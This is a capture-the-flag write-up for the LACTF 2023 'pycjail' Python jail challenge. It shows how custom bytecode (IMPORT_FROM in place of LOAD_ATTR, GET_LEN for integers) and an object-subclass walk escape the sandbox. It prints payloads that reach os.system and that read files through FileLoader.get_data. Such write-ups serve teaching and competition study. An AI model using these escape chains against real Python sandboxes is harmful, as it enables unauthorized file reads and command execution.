Writeup - Pycjail (LACTF 2023)
- Type - jail
- Name - pycjail
- Points - 495
Description
1 | All of you think you're so cute with your fancy little sandbox bypasses, but jokes on |
Writeup
This challenge required you to bypass a Python jail, which limited several aspects of a custom code
object you created. The source code for the jail is here, or below:
1 | #!/usr/local/bin/python3 |
To summarize the code above, you provided the co_consts, co_names, and co_code bytes for a custom code object that was then created and run. The restrictions imposed were:
- max 3 consts
- max 4 names
- max 15 opcodes
- opcodes can’t be in ['IMPORT_NAME', 'MAKE_FUNCTION', 'STORE_SUBSCR', 'DELETE_SUBSCR', 'LOAD_BUILD_CLASS', 'LOAD_ASSERTION_ERROR', 'STORE_NAME', 'DELETE_NAME', 'STORE_ATTR', 'DELETE_ATTR', 'STORE_GLOBAL', 'DELETE_GLOBAL', 'LOAD_NAME', 'LOAD_ATTR', 'JUMP_FORWARD', 'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP', 'JUMP_ABSOLUTE', 'POP_JUMP_IF_FALSE', 'POP_JUMP_IF_TRUE', 'LOAD_GLOBAL', 'JUMP_IF_NOT_EXC_MATCH', 'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST', 'LOAD_CLOSURE', 'LOAD_DEREF', 'STORE_DEREF', 'DELETE_DEREF', 'LOAD_CLASSDEREF', 'LOAD_METHOD'] (aka no import/makefunc/load/store/delete/jump)
- opcode values can’t be > 3
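The banned list above follows a simple naming pattern, which the parenthetical summarizes. Here is a minimal sketch of how such a list could be derived from the running interpreter's opcode table. The filter rule is inferred from the list itself, not taken from the challenge source, and the helper name banned_opcode_names is hypothetical. Opcode names differ between Python versions, so the output only lines up with the challenge on 3.10.

```python
import opcode


def banned_opcode_names():
    """Rebuild a ban list from the pattern seen in the list above (an assumption)."""
    banned = {"IMPORT_NAME", "MAKE_FUNCTION"}
    for name in opcode.opmap:
        is_load = "LOAD" in name and name != "LOAD_CONST"
        if is_load or "STORE" in name or "DELETE" in name or "JUMP" in name:
            banned.add(name)
    return banned


banned = banned_opcode_names()
# Everything the interpreter knows about that the pattern does not ban.
allowed = sorted(set(opcode.opmap) - banned)
print(len(banned), "banned,", len(allowed), "allowed")
print(allowed)
```

Printing the allowed set this way gives a starting list to work through opcode by opcode.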
Nothing about the flag was mentioned, so it was likely in /flag.txt or ./flag.txt, or if they were evil they’d require you to get RCE to read the flag. I was banking on the fact that it was stored in /flag.txt or ./flag.txt, so my goal was to get arbitrary read.
Approaching the Problem
I made a list of all the Python 3.10 opcodes that were allowed in this jail by pulling from the documentation and removing the opcodes banned in the list above. What caught my eye initially was that the opcodes CALL_FUNCTION and CALL_METHOD were not banned, and these are what allow you to call a function on the stack. However, the hard part was getting a callable object on the stack in the first place. The opcodes LOAD_GLOBAL, LOAD_NAME, LOAD_METHOD, and LOAD_ATTR are typically used to get a function on the stack, and all LOAD opcodes were blocked except for LOAD_CONST (which only allowed us to put strings on the stack). As an example, the bytecode for the line open("flag.txt").read() is shown below:
dis.dis(compile('open("flag.txt").read()','pycjail','eval'))
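To see which instructions put the callable on the stack without reading a full listing, the opcode names can be collected programmatically. This is a small sketch, not the author's tooling. The exact instruction names depend on the interpreter version (3.10 uses LOAD_NAME, LOAD_METHOD, CALL_FUNCTION and CALL_METHOD here, while newer versions use different call opcodes), so no fixed output is shown.

```python
import dis

# compile() only builds the code object; the file is never opened.
code = compile('open("flag.txt").read()', "pycjail", "eval")

# One opcode name per instruction, in execution order.
opnames = [ins.opname for ins in dis.get_instructions(code)]
print(opnames)

# The names and constants the instructions index into.
print(code.co_names, code.co_consts)
```

Both open and read end up in co_names, which is exactly what the jail's banned LOAD opcodes would normally fetch.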
To test various payloads with the provided main.py script, I created this small script to give me the info I wanted:
1 | import dis |
Based on the provided code_str, it would show me a disassembly of the code, along with co_consts, co_names, and co_code in the desired form.
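A helper along these lines might look like the sketch below. It is a reconstruction for illustration, not the author's script: the function name describe, the comma-separated output for consts and names, and the hex encoding of co_code are all assumptions about what a convenient format would be.

```python
import dis


def describe(code_str):
    """Compile an expression and return the three pieces the jail asks for."""
    code = compile(code_str, "pycjail", "eval")
    dis.dis(code)  # human-readable listing, printed to stdout
    return {
        "consts": ",".join(str(c) for c in code.co_consts),  # assumed format
        "names": ",".join(code.co_names),                    # assumed format
        "code": code.co_code.hex(),                          # assumed format
    }


info = describe('"abcd".__class__.__base__')
for key, value in info.items():
    print(f"{key}: {value}")
```

The compiler will emit LOAD_ATTR for this expression, so the hex output still has to be patched by hand before it can pass the jail's opcode filter.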
Now that I was set up to try stuff, I went through the Python bytecode documentation, opcode by opcode, trying to see if there was anything that would put a callable on the stack. Many of the opcodes were eliminated from the start, such as BINARY_*, UNARY_*, INPLACE_*, POP_*, ROT_*, and DUP_*. The CALL_* opcodes were going to be useful later on, but wouldn’t help us get a callable onto the stack. After spending about an hour with a teammate looking through the opcodes, we felt like there wasn’t anything there. So we did what anyone would do and asked ChatGPT (no, it wasn’t helpful).
Turning Point
Desperate, we did some more research online with CTF writeups until I came across a write-up by kmh from DiceCTF 2021. The challenge TI-1337 Plus CE was also a pyjail, and one of the things this user learned was that “IMPORT_FROM is LOAD_ATTR in disguise!”.
The opcode IMPORT_FROM was not banned, but we hadn’t paid much attention to it because it always follows (and only functions properly with) the opcode IMPORT_NAME, which was banned. However, if we could use it as a stand-in for LOAD_ATTR, then we could get a callable onto the stack, and through attribute stacking run some code like "".__class__.__base__.__subclasses__()[144]()._module.__builtins__["eval"]("insert code here").
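The trick can be tried in isolation by hand-assembling a few instructions. The sketch below is an illustration under stated assumptions, not the challenge payload: the helper name getattr_via_import_from is hypothetical, and because raw bytecode is specific to one interpreter version, it only builds and runs the code object on CPython 3.10 and returns None everywhere else.

```python
import opcode
import sys


def getattr_via_import_from(obj, attr_name):
    """Read obj.attr_name using IMPORT_FROM; only attempted on CPython 3.10."""
    if sys.implementation.name != "cpython" or sys.version_info[:2] != (3, 10):
        return None  # bytecode layout differs elsewhere, so do nothing
    op = opcode.opmap
    raw = bytes([
        op["LOAD_CONST"], 0,    # push consts[0] (the object)
        op["IMPORT_FROM"], 0,   # push the attribute names[0]; object stays below
        op["ROT_TWO"], 0,       # bring the leftover object to the top
        op["POP_TOP"], 0,       # and drop it
        op["RETURN_VALUE"], 0,  # return the attribute
    ])
    template = compile("None", "pycjail-demo", "eval")
    crafted = template.replace(
        co_code=raw, co_consts=(obj,), co_names=(attr_name,), co_stacksize=2
    )
    return eval(crafted)


result = getattr_via_import_from("", "__class__")
print(result)
```

On 3.10 this should print the str class, because IMPORT_FROM simply looks the name up as an attribute of whatever object is on top of the stack.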
It was also apparent that since using IMPORT_FROM in place of LOAD_ATTR isn’t default behavior for the Python interpreter, we would have to manually create custom bytecode to be successful. This actually made sense; normally, pyjails just ask for a line of code (a single input() call), but this one had you specify certain parts of the code object you wanted to create. Realizing that the required bytecode wouldn’t be typical, or perhaps even technically compliant, explained the challenge author’s design choice.
Manual testing confirmed our suspicion that IMPORT_FROM worked as desired, so it was now time to create a payload.
Developing a Payload With Restrictions
A lot of testing and trial & error was performed at this point to get a payload that would work. Getting the payload "".__class__.__base__.__subclasses__ to work was fairly simple; however, we ran into errors doing "".__class__.__base__.__subclasses__().
1 | $ python3 main.py |
The opcode used above was CALL_METHOD, so I tried CALL_FUNCTION and it worked! Apparently the two ways of calling functions are pairing LOAD_METHOD with CALL_METHOD, or LOAD_ATTR with CALL_FUNCTION.
The next issue we ran into was getting a number on the stack. Because main.py used the input() function to get the data, everything was treated as a string. Inserting 1 as a const would always have it render as '1'. After some research, we settled on the GET_LEN opcode, which just ran the len() function on the item on top of the stack. Since our first constant was just an empty string, and the actual value of the string didn’t matter (aka "".__class__ and "abcd".__class__ are the same), we could load that const onto the stack again and run GET_LEN to put the length of that string onto the stack. We could just set the length of the initial string to whatever we wanted to obtain the desired integer.
However, a second hiccup was encountered that required 2 additional opcodes to bypass. GET_LEN pushed the integer we wanted onto the stack, but kept the loaded string on there too, which we didn’t want. I had to insert an extra ROT_TWO and POP_TOP opcode to switch the order and remove the string from the stack.
At this point, the payload we had was:
1 | Python code: 'aaaa...aaa'.__class__.__base__.__subclasses__()[14] |
We had 2 consts, 1 name, and 4 opcodes left to get what we wanted, but we had access to an extensive list of classes that opened up functionality a lot.
The “stereotypical” payload from HackTricks is to use ''.__class__.__base__.__subclasses__()[144]()._module.__builtins__['__import__']('os').system('ls') to run system commands (note that this was slightly modified from the Python2 version, and the exact index of <class 'warnings.catch_warnings'> may vary depending on your installation & version). The problem with this payload was it required another 3 names (_module, __builtins__, system) and 3 consts ('__import__', 'os', 'ls'), which we didn’t have. We considered making our first const of length 144 the same as our last const (padding our bash payload with extra ;s until we reached our desired length), but that still left us 2 names over the limit.
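Since the index depends on the installation, it is safer to look it up than to hard-code 144. A minimal sketch, with a hypothetical helper name subclass_index:

```python
import warnings


def subclass_index(target):
    """Return the position of `target` in object.__subclasses__(), or None."""
    for index, cls in enumerate(object.__subclasses__()):
        if cls is target:
            return index
    return None


index = subclass_index(warnings.catch_warnings)
print(index)  # varies between installations and Python versions
```

The same lookup works for any other direct subclass of object, which makes it easy to find the index needed for a particular target environment.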
Our second thought was "".__class__.__base__.__subclasses__()[144]()._module.__builtins__["eval"]("insert code here"), but that required 2 names and 2 consts (still 1 too many names).
After perusing the list of available classes one by one, I started looking into the class at index 118, which was <class '_frozen_importlib_external.FileLoader'>. Looking at this class’s attributes, I saw the function get_data(), which takes a file path; because we call it on the class itself rather than on an instance, it needs two arguments, with the first one filling the self slot. Excited, I wrote up and tested the code ("a"*118).__class__.__base__.__subclasses__()[118].get_data('flag.txt','flag.txt'), and my local flag was printed! This only required 1 extra name and const (we even had one const left over), and used exactly 4 more opcodes.
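The get_data() behavior can be checked locally without the jail. The sketch below assumes CPython, where the class is reachable as _frozen_importlib_external.FileLoader, and uses a throwaway file in a temporary directory in place of the real flag.

```python
import os
import tempfile

import _frozen_importlib_external

file_loader = _frozen_importlib_external.FileLoader

with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "flag.txt")
    with open(path, "w") as handle:
        handle.write("flag{local_test}")
    # Called on the class, so the first argument only fills the `self` slot.
    data = file_loader.get_data(path, path)

print(data)  # the file contents, as bytes
```

Passing the same string twice is what lets the payload get away with a single extra const.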
Final Payload
The final payload was:
1 | ''.__class__.__base__.__subclasses__()[118].get_data('flag.txt','flag.txt') |
Flag: flag{maybe_i_should_only_allow_nops_next_time}